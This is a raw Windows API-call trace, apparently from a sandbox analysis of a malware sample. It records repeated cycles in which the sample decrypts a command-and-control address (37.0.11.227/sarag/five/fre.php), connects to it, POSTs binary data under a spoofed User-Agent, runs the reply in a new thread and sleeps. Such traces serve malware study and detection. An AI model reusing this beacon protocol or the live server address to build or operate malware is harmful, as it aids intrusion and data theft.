(dwMilliseconds=0xea60) [0237.824] GetProcessHeap () returned 0x690000 [0237.824] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0237.825] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0237.826] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0237.845] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0237.846] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0237.857] GetProcessHeap () returned 0x690000 [0237.857] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0237.857] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0237.858] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0237.859] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0237.859] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0237.860] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0237.860] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0237.860] GetProcessHeap () returned 0x690000 [0237.861] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0237.862] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0237.862] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0237.863] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0237.863] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0237.864] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0237.871] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0237.871] GetProcessHeap () returned 0x690000 [0237.871] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0237.872] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0237.872] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0237.873] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0237.873] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0237.874] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0237.875] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0237.875] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0237.876] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0237.876] GetProcessHeap () returned 0x690000 [0237.876] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0237.876] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0237.876] GetProcessHeap () returned 0x690000 [0237.876] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0237.877] GetProcessHeap () returned 0x690000 [0237.877] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0237.877] GetProcessHeap () returned 0x690000 [0237.877] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0237.877] GetProcessHeap () returned 0x690000 [0237.877] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0237.878] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0237.878] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0237.884] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0237.884] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0237.890] GetProcessHeap () returned 0x690000 [0237.890] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0237.891] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0237.891] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0237.892] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0237.893] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0237.893] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0237.894] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0237.894] GetProcessHeap () returned 0x690000 [0237.894] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0237.895] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0237.896] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0237.896] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0237.897] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0237.897] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0237.898] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0237.898] GetProcessHeap () returned 0x690000 [0237.898] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0237.899] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0237.899] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0237.900] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0237.900] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0237.901] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0237.903] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0237.904] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0237.904] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0237.904] GetProcessHeap () returned 0x690000 [0237.904] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0237.904] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0237.904] GetProcessHeap () returned 0x690000 [0237.904] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab360 [0237.904] socket (af=2, type=1, protocol=6) returned 0x624 [0237.905] connect (s=0x624, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0237.930] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0237.930] GetProcessHeap () returned 0x690000 [0237.930] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0237.930] GetProcessHeap () returned 0x690000 [0237.930] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b77b0 [0237.931] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0237.932] wvsprintfA (in: param_1=0x6b77b0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0237.932] GetProcessHeap () returned 0x690000 [0237.932] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afb00 [0237.932] GetProcessHeap () returned 0x690000 [0237.933] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b77b0 | out: hHeap=0x690000) returned 1 [0237.933] GetProcessHeap () returned 0x690000 [0237.933] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0237.933] GetProcessHeap () returned 0x690000 [0237.933] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b77b0 [0237.933] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0237.934] wvsprintfA (in: param_1=0x6b77b0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0237.934] GetProcessHeap () returned 0x690000 [0237.934] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0237.934] GetProcessHeap () returned 0x690000 [0237.935] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b77b0 | out: hHeap=0x690000) returned 1 [0237.935] send (s=0x624, buf=0x6ad508*, len=242, flags=0) returned 242 [0237.935] send (s=0x624, buf=0x6aba40*, len=159, flags=0) returned 159 [0237.935] GetProcessHeap () returned 0x690000 [0237.936] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0237.936] recv (in: s=0x624, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0238.011] GetProcessHeap () returned 0x690000 [0238.012] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0238.013] GetProcessHeap () returned 0x690000 [0238.013] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0238.013] GetProcessHeap () returned 0x690000 [0238.014] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afb00 | out: hHeap=0x690000) returned 1 [0238.014] GetProcessHeap () returned 0x690000 [0238.015] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0238.015] closesocket (s=0x624) returned 0 [0238.015] GetProcessHeap () returned 0x690000 [0238.015] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab360 | out: hHeap=0x690000) returned 1 [0238.015] GetProcessHeap () returned 0x690000 [0238.016] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0238.016] GetProcessHeap () returned 0x690000 [0238.016] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0238.016] GetProcessHeap () returned 0x690000 [0238.016] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0238.017] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x5a0) returned 0x624 [0238.018] Sleep (dwMilliseconds=0xea60) [0238.020] GetProcessHeap () returned 0x690000 [0238.020] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0238.020] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0238.021] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0238.035] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0238.036] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0238.046] GetProcessHeap () returned 0x690000 [0238.046] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0238.046] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0238.047] CryptImportKey (in: hProv=0x6af188, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0238.048] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0238.050] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0238.051] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0238.051] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0238.051] GetProcessHeap () returned 0x690000 [0238.052] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0238.053] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0238.053] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0238.054] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0238.054] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0238.055] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0238.056] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0238.056] GetProcessHeap () returned 0x690000 [0238.056] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0238.056] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0238.057] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0238.057] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0238.063] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0238.064] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0238.064] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0238.065] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0238.065] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0238.065] GetProcessHeap () returned 0x690000 [0238.065] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0238.065] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0238.066] GetProcessHeap () returned 0x690000 [0238.066] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0238.066] GetProcessHeap () returned 0x690000 [0238.066] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0238.066] GetProcessHeap () returned 0x690000 [0238.067] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0238.067] GetProcessHeap () returned 0x690000 [0238.067] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0238.068] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0238.068] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0238.076] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0238.076] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0238.084] GetProcessHeap () returned 0x690000 [0238.084] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0238.085] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0238.085] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0238.086] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0238.086] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0238.087] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0238.087] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0238.087] GetProcessHeap () returned 0x690000 [0238.087] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0238.088] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0238.088] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0238.089] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0238.089] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0238.090] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0238.090] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0238.090] GetProcessHeap () returned 0x690000 [0238.090] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0238.091] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0238.091] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0238.092] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0238.092] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0238.092] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0238.093] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0238.093] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0238.094] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0238.094] GetProcessHeap () returned 0x690000 [0238.094] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0238.094] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0238.094] GetProcessHeap () returned 0x690000 [0238.094] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab390 [0238.094] socket (af=2, type=1, protocol=6) returned 0x628 [0238.094] connect (s=0x628, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0238.120] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0238.120] GetProcessHeap () returned 0x690000 [0238.120] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aeff0 [0238.120] GetProcessHeap () returned 0x690000 [0238.120] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b77b0 [0238.121] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0238.122] wvsprintfA (in: param_1=0x6b77b0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0238.122] GetProcessHeap () returned 0x690000 [0238.122] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afe00 [0238.122] GetProcessHeap () returned 0x690000 [0238.123] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b77b0 | out: hHeap=0x690000) returned 1 [0238.123] GetProcessHeap () returned 0x690000 [0238.123] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0238.123] GetProcessHeap () returned 0x690000 [0238.123] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b77b0 [0238.124] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0238.125] wvsprintfA (in: param_1=0x6b77b0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0238.127] GetProcessHeap () returned 0x690000 [0238.127] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0238.127] GetProcessHeap () returned 0x690000 [0238.127] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b77b0 | out: hHeap=0x690000) returned 1 [0238.128] send (s=0x628, buf=0x6ad508*, len=242, flags=0) returned 242 [0238.128] send (s=0x628, buf=0x6aba40*, len=159, flags=0) returned 159 [0238.128] GetProcessHeap () returned 0x690000 [0238.128] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0238.128] recv (in: s=0x628, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0238.209] GetProcessHeap () returned 0x690000 [0238.209] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0238.209] GetProcessHeap () returned 0x690000 [0238.210] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0238.210] GetProcessHeap () returned 0x690000 [0238.211] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afe00 | out: hHeap=0x690000) returned 1 [0238.211] GetProcessHeap () returned 0x690000 [0238.211] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeff0 | out: hHeap=0x690000) returned 1 [0238.211] closesocket (s=0x628) returned 0 [0238.212] GetProcessHeap () returned 0x690000 [0238.212] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab390 | out: hHeap=0x690000) returned 1 [0238.212] GetProcessHeap () returned 0x690000 [0238.212] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0238.212] GetProcessHeap () returned 0x690000 [0238.212] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0238.212] GetProcessHeap () returned 0x690000 [0238.212] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0238.213] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x4c4) returned 0x628 [0238.214] Sleep (dwMilliseconds=0xea60) [0238.218] GetProcessHeap () returned 0x690000 [0238.218] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a3fe0 [0238.219] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0238.219] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0238.226] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0238.226] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0238.233] GetProcessHeap () returned 0x690000 [0238.233] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0238.234] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0238.235] CryptImportKey (in: hProv=0x6af188, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0238.236] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0238.236] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0238.239] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 